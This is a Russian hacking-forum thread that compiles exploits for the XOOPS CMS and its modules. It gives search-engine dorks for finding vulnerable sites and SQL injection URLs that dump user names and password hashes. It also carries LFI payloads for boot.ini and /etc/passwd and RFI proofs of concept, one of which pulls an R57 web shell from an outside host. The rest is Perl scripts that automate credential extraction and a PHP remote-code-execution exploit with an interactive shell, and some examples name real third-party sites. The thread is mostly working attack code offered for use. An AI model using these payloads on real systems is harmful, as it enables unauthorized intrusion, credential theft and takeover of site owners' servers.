Форум АНТИЧАТ - [Обзор уязвимости] Xoops и его модулей.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - [Обзор уязвимости] Xoops и его модулей. (https://forum.antichat.xyz/showthread.php?t=64367)

[Обзор уязвимости] Xoops и его модулей.

XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability

DORKS 1 : allinurl :"/modules/tutorials/"
DORK 2 : allinurl :"/modules/tutorials/"tid

EXPLOIT 1 :

PHP код:


		
			
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/*

EXPLOIT 2 :

PHP код:


		
			
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*

================================================
XOOPS Module My_eGallery 3.04 (gid) SQL Injection Vulnerability

DORKS 1 : allinurl :"modules/my_egallery"

EXPLOIT :

PHP код:


		
			
modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*

================================================
XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability

DORKS 1 : allinurl :"modules/gallery"
DORK 2 : allinurl :"modules/gallery"gid

EXPLOIT :

PHP код:


		
			
modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*

================================================
XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability

DORK 1 : allinurl: "modules/wfdownloads/viewcat.php?cid"
DORK 2 : allinurl: "modules/wfdownloads"
EXPLOIT :

PHP код:


		
			
modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass

================================================
XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerabilit
DORK 1 : allinurl: "modules/glossaires"
EXPLOIT :

PHP код:


		
			
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme

================================================
PS найденные за март 2008

LFI

Vulnerable: XOOPS 2.0.18

Уязвимый скрипт: htdocs/install/index.php

PHP код:


		
			
$language = 'english';

if ( !empty($_POST['lang']) ) {

    $language = $_POST['lang'];

.

.

.

.







if ( file_exists("./language/".$language."/install.php") ) {

    include_once "./language/".$language."/install.php";

POST-переменная "lang" не фильтруется

PoC:

Код:

POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0

Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1

Content-Length: 67

Accept: */*

Accept-Language: en-US

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: localhost

Content-Type: application/x-www-form-urlencoded

Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php



lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next

URL Redirection

Vulnerable: XOOPS 2.0.18

Уязвимый скрипт: htdocs/user.php?xoops_redirect
POST-переменная "xoops_redirect" не фильтруется

PoC:

Код:

http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com

XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
DORK 1 : allinurl: "modules/dictionary"

DORK 2 : allinurl: "modules/dictionary/print.php?id"

EXPLOIT :

Код HTML:

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*

XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability

Код:

##########################################

#

# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection

#

##########################################

#

##AUTHOR : S@BUN

#

####HOME : http://www.milw0rm.com/author/1334

#

####MAİL : hackturkiye.hackturkiye@gmail.com

#

###########################################

#

# DORK 1 : allinurl: "modules/dictionary"

#

# DORK 2 : allinurl: "modules/dictionary/print.php?id"

#

###########################################

EXPLOIT :



modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*

###########################################

Dictionary Version 0.94 by nagl.ch

Dictionary Version 0.91 by nagl.ch

Dictionary Version 0.70 by nagl.ch

###########################################

##################S@BUN####################

###########################################

#####hackturkiye.hackturkiye@gmail.com#####

###########################################



# milw0rm.com [2008-03-17]

milw0rm.com

XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability

SQL Injection

Vulnerable: XOOPS Project-Recette(Recipe)2.2

Exploit:

Код:

modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*

Dork:

Код:

allinurl :\"modules/recipe\"

RFI

Vulnerable: XOOPS Module XFsection

Vuln script: modify.php

PoC:

Код:

http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?

Vulnerable: XOOPS Module XT-Conteudo

Vuln script: /admin/spaw/spaw_control.class.php

PHP код:


		
			
include $spaw_root.'config/spaw_control.config.php';

include $spaw_root.'class/toolbars.class.php';

include $spaw_root.'class/lang.class.php';

PoC:

Код:

http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?

Vulnerable: XOOPS Module Cjay Content 3

Vuln script: /admin/editor2/spaw_control.class.php

PHP код:


		
			
include $spaw_root.'config/spaw_control.config.php';

include $spaw_root.'class/toolbars.class.php';

include $spaw_root.'class/lang.class.php';

Note: Register globals must be ON, and Magic Quotes must be OFF

PoC:

Код:

http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]?

Vulnerable: XOOPS Module icontent 1.0

Exploit:

Код HTML:

<html>

<head>

<meta http-equiv="Content-Type" content="text/html;

charset=windows-1254">

<title>XOOPS Module icontent v.1.0 Remote File Inclusion

Exploit</title>



<script language="JavaScript">



//'===============================================================================================

//'[Script Name: XOOPS Module icontent v.1.0

//'[Author     : Mahmood_ali

//'[S.Page     : 

http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip

//'===============================================================================================



//'[[V.Code]]------------------------------------------------------

//'

//'include $spaw_root.'config/spaw_control.config.php';

//'include $spaw_root.'class/toolbars.class.php';

//'include $spaw_root.'class/lang.class.php';

//'

//'[[V.Code]]---------------------------------------------------------



//# Tryag.Com

//# ...









   var path="/modules/icontent/include/wysiwyg/"

   var adres="spaw_control.class.php" //File name

   var acik ="?spaw_root=" // Line 15

   var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell



   function command(){

       if (document.rfi.target1.value==""){

          alert("Failed..");

      return false;

    }







  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready

  rfi.submit(); // Form Submit

   }

</script>



</head>



<body bgcolor="#000000">

<center>



<p><b><font face="Arial" size="2"

color="#FFFFFF">XOOPS Module icontent 

v.1.0 Remote File Inclusion Exploit</font></b></p>



<p></p>

<form method="post" target="getting"

name="rfi" onSubmit="command();">

    <b><font face="Tahoma" size="1"

color="#FF0000">Target:</font><font 

face="Tahoma" size="1" 

color="#FFFF00">[http://[target]/[scriptpath]</font><font

color="#00FF00" 

size="2" face="Tahoma">

  </font><font color="#FF0000"

size="2"> </font></b>

  <input type="text" name="target1"

size="20" style="background-color: 

#808000"

onmouseover="javascript:this.style.background='#808080';" 

onmouseout="javascript:this.style.background='#808000';"></p>

  <p><input type="submit" value="Gonder"

name="B1"><input type="reset" 

value="Sifirla" name="B2"></p>

</form>

<p><br>

<iframe name="getting" height="337"

width="633" scrolling="yes" 

frameborder="0"></iframe>

</p>



<b><font face="Lucida Handwriting" size="5" 

color="#FF0000">Mahmood_ali</font></b><p>

<b><a href="http://tryag.com/cc">

<font face="Lucida Handwriting" size="5" 

color="#FFFFFF">TrYaG-Team</font></a></b></p>

</p>

</center>

</body>



</html>

Vulnerable: XOOPS Module tsdisplay4xoops 0.1

PoC:

Код:

[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell

Remote SQL Injection

Vulnerable: XOOPS Module Jobs <= 2.4

Код:

#!/usr/bin/perl

#[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL

Injection Exploit

#[Coded by   : ajann

#[Author     : ajann

#[Contact    : :(

#[Dork       : "inurl:/modules/jobs/"

#[S.Page     : http://www.jlmzone.com/

#[$$         : Free

#[..         : ajann,Turkey





use IO::Socket;

if(@ARGV < 1){

print "

[========================================================================

[//  XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit

[//                   Usage: exploit.pl [target]

[//                   Example: exploit.pl victim.com

[//                   Example: exploit.pl victim.com

[//                           Vuln&Exp : ajann

[========================================================================

";

exit();

}

#Local variables

$kapan = "/*";

$server = $ARGV[0];

$server =~ s/(http:\/\/)//eg;

$host = "http://".$server;

$port = "80";

$file = "/modules/jobs/index.php?pa=jobsview&cid=";



print "Script <DIR> : ";

$dir = <STDIN>;

chop ($dir);



if ($dir =~ /exit/){

print "-- Exploit Failed[You Are Exited] \n";

exit();

}



if ($dir =~ /\//){}

else {

print "-- Exploit Failed[No DIR] \n";

exit();

 }



print "User ID (uid): ";

$id = <STDIN>;

chop ($id);



$target =

"-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;

$target = $host.$dir.$file.$target;



#Writing data to socket

print

"+**********************************************************************+\n";

print "+ Trying to connect: $server\n";

$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr

=> "$server", PeerPort => "$port") || die

"\n+ Connection failed...\n";

print $socket "GET $target HTTP/1.1\n";

print $socket "Host: $server\n";

print $socket "Accept: */*\n";

print $socket "Connection: close\n\n";

print "+ Connected!...\n";

#Getting

while($answer = <$socket>) {

if ($answer =~ /username:(.*?)pass/){

print "+ Exploit succeed! Getting admin information.\n";

print "+ ---------------- +\n";

print "+ Username: $1\n";

}



if ($answer =~ /password:(.*?)<\/b>/){

print "+ Password: $1\n";

}



if ($answer =~ /Syntax error/) { 

print "+ Exploit Failed : ( \n";

print

"+**********************************************************************+\n";

exit(); 

}



if ($answer =~ /Internal Server Error/) {

print "+ Exploit Failed : (  \n";

print

"+**********************************************************************+\n";

exit(); 

}

 }

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

PHP код:


		
			
#############################################

#Coded By Cr@zy_King      http://coderx.org]#

#############################################



use IO::Socket;



if (@ARGV != 3)

{

    print "\n-----------------------------------\n";

    print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";

    print "-----------------------------------\n";

    print "\n4ever Cra\n";

    print "crazy_kinq[at]hotmail.co.uk\n";

    print "http://coderx.org\n";

    print "\n-----------------------------------\n";

    print "\nKullanim: $0 <server> <path> <uid>\n";

    print "Ornek: $0 www.victim.com /path 1\n";

    print "\n-----------------------------------\n";

    exit ();

}



$server = $ARGV[0];

$path = $ARGV[1];

$uid = $ARGV[2];



$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort =>

"80");

printf $socket ("GET

%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/*

HTTP/1.0\nHost: %s\nAccept: */*\nConnection:

close\n\n",

$path,$server,$uid);



while(<$socket>)



{

    if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }

}



# Cr@zy_King

# http://coderx.org

# crazy_kinq@hotmail.co.uk

Solide Snake, не разу на blind не натыкался.

xoops # Article Module # sql injection

Код:

modules/articles/article.php?id={SQL}--

+xoops_users
-uname
-pass

example:

Код:

http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_users+limit+0,1--

mega exploit :D :

Код:

#!usr/bin/perl

use LWP::UserAgent;

print qq(

# xoops article module exploit #

#     coded by ph1l1ster       #\n\n# Enter site:\n> );

$site = <STDIN>;chomp($site);

print "\n# Enter numbers of users:\n> ";

$users = <STDIN>;chomp($users);

&inj;

sub inj{

print "\nStarting..\n\n";

$limit = 0;

while ($limit <= $users){

$url = "http://".$site."/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(555666,0x3a,uname,0x3a,pass,0x3a,777888),8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users+limit+".$limit.",1--";

$client = LWP::UserAgent->new( ) or die;

$answer = $client->get($url);

$limit ++;

if ($answer->content =~ /555666:(.*):777888/){

print $1."\n";}}

print "Done!"}

XOOPS modules/easyweb/

SQL-inj

Exploit

Код:

-555555+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--

http://ofernio.ru/portal/modules/easyweb/?artid=-5+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+ from+xoops_users--

dOrK: inurl:/modules/easyweb/

XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit

Код:

#!/usr/bin/php -q

<?php



/****************************************************************

 * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    *

 * by athos - staker[at]hotmail[dot]it                          *            

 * http://xoops.org                                             *           

 *                                                              *             

 * thanks to s3rg3770 and The:Paradox                           *            

 *                                                              *            

 * works with register globals on                               *            

 * note: this vuln is a remote php code execution               *              

 *                                                              *   

 * Directory (xoops_lib/modules/protector/)                     *

 * onupdate.php?mydirname=a(){} [PHP CODE] function v           *

 * oninstall.php?mydirname=a(){} [PHP CODE] function v          *

 * notification.php?mydirname=a(){} [PHP CODE] function v       *

 ****************************************************************/



error_reporting(0);



list($cli,$host,$path,$num) = $argv;



if ($argc != 4) {  

    

    print "\n+--------------------------------------------------------------+\n";

    print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    |\n";    

    print "\r+--------------------------------------------------------------+\n";

    print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";

    print "\rUsage: php xpl.php [host] [path]\n\n";

    print "\rhost     + localhost\n";

    print "\rpath     + /XOOPS\n";

    exit;      

}         



exploit();



function exploit() {

    

    global $num;

    

    if ($num > 3) {

       die("\n$num isn't a valid option\n");

    } 

    else {

       yeat_shell();

    }

}



    

function yeat_shell() {

    

    while (1) {

        echo "yeat[php-shell]~$: "; 

        $exec = stripslashes(trim(fgets(STDIN)));  

        

        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");

        if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");

        if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");



        print data_exec($exec);     

    }

}





function data_exec($exec) {

    

    global $host,$path,$num;

    

    if ($num == 1) {

        $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";

    }

    

    if ($num == 2) {

        $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";

    }

    

    if ($num == 3) {

        $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";

    }

    

    $exec = urlencode($exec);

    $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";

    $data .= "Host: {$host}\r\n";

    $data .= "User-Agent: Lynx (textmode)\r\n";

    $data .= "Connection: close\r\n\r\n";

    

    $html = data_send ($host,$data);



    return $html;

}





function data_send ($host,$data) {

   

    if (!$sock = @fsockopen($host,80)) {

        die("Connection refused,try again!\n");

    }   fputs($sock,$data);

    

    while (!feof($sock)) { $html .= fgets($sock); }

    

    fclose($sock);

    return $html;

}

(c)milw0rm.com

LFI[Xoops 2.2.6]

Под руку попалась эта версия.
Смотри исходники system/admin.php:

Код:

<?php

if (isset($_POST['fct'])) {

$fct = trim($_POST['fct']);

}

if (isset($_GET['fct'])) {

$fct = trim($_GET['fct']);

}

$xoopsOption['pagetype'] = "admin";

include "../../mainfile.php";

if (!$xoopsUser) {

redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT);

}

include XOOPS_ROOT_PATH."/include/cp_functions.php";



include_once XOOPS_ROOT_PATH."/modules/system/constants.php";

$error = false;

if (isset($fct) && $fct != '') {

if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {



if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {

include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";

} elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {

...

}

include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";

...

Експлоит:

Код:

http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00